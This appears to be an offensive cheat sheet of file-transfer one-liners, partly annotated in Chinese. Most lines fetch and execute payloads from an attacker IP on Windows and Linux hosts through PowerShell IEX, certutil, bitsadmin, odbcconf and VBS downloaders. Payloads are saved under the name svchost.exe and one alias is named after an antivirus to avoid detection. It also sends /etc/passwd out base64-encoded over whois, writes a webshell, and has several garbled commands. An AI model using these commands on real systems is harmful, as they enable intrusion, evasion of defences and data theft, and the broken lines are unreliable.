Python

Server (Python2):
python2 -m SimpleHTTPServer 443
Server (Python3):
python3 -m http.server 443
FTP (pyftpdlib):
python3 -m pyftpdlib -p 443
SMB (impacket):
python3 impacket-smbserver.py files . -port 443
Download (Python2):
python2 -c "import urllib2; exec urllib2.urlopen('http://207.46.13.150:443/test.exe').read()"
Download (Python3):
python3 -c "import urllib.request as u; exec(u.urlopen('http://207.46.13.150:443/test.exe').read())"

php 5.4+ http:

php 5.4+ http:
php -S 0.0.0.0:443

Ruby:

ruby http:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 443, :DocumentRoot => Dir.pwd).start'
ruby 1.9.2+ http:
ruby -run -e httpd . -p 443 --bind-address 0.0.0.0

Busybox:

busybox httpd:
busybox httpd -f -p 443

PowerShell:

PowerShell - IWR:
powershell.exe -Command "Invoke-WebRequest -Uri http://207.46.13.150:443/test.exe -OutFile svchost.exe"
PowerShell - IEX:
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://207.46.13.150:443/test.exe', svchost.exe)"

Certutil:

Certutil:
certutil.exe -urlcache -split -f  http://207.46.13.150:443/test.exe svchost.exe"

Smb IPC$:

Certutil:
copy \\207.46.13.150\users\public\test.exe c:\users\public\svchost.exe

Linux Download:

Wget:
wget http://207.46.13.150:443/test.exe -O svchost.exe
Curl:
wget http://207.46.13.150:test.exe/svchost.exe -o %!s(MISSING)
whois::
whois -h 207.46.13.150 -p 443 `cat /etc/passwd | base64`
nc -lvvp 443 | sed "s/ //g" | base64 -d

Windows Download:

Windows Bitsadmin:
bitsadmin /rawreturn /transfer down "http://207.46.13.150:443/test.exe" c:\\svchost.exe
CertReq.exe 下载:
CertReq -Post -config http://207.46.13.150:443/ c:\windows\win.ini output.txt
CertReq.exe 上传:
CertReq -Post -config http://207.46.13.150:443/ c:\windows\win.ini and show response in terminal
Windows echo 写入base64+url编码的webshell,CertUtil进行解码:
#写入:
			echo%20base64+URL编码的webshell%!>(MISSING)webshell.jsp
			#CertUtil解码:
			CertUtil -decode Base64编码文件名(可包含路径) 解码后生成的文件名(可包含路径)
			#注意:CertUtil解码不能与存在的文件名重复
Windows Bitsadmin:
Set xPost = CreateObject("Microsoft.XMLHTTP") 
			xPost.Open "GET",LCase(WScript.Arguments(0)),0 
			xPost.Send() 
			Set sGet = CreateObject("ADODB.Stream") 
			sGet.Mode = 3 
			sGet.Type = 1 
			sGet.Open() 
			sGet.Write(xPost.responseBody) 
			sGet.SaveToFile LCase(WScript.Arguments(1)),2
			
			使用方法:上面的内容保存为wget.vbs
			csript wget.vbs http://207.46.13.150:443/test.exe svchost.exe
Windows vbs下载器:
Set xPost = CreateObject("Microsoft.XMLHTTP") 
			Set xPost = createObject("Microsoft.XMLHTTP")
			xPost.Open "GET"," http://192.168.3.39:4433/hashes.txt",0
			xPost.Send()
			Set sGet = createObject("ADODB.Stream")
			sGet.Mode = 3
			sGet.Type = 1
			sGet.Open()
			sGet.Write(xPost.responseBody)
			sGet.SaveToFile "C:\hash.txt",2
			
			使用方法:down.vbs  | cscript down.vbs
Windows PowerShell:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://207.46.13.150:443/payload.ps1')
Windows odbcconf(执行包含特殊功能的DLL,这种DLL文件不需要使用.dll后缀,而且可以通过UNC/WebDAV下载):
odbcconf /s /a {regsvr \\http://207.46.13.150:test.exe/\folder\payload_dll.txt}

参考 File Download Generator:https://file-downloads.com/

From:File-Download-Generator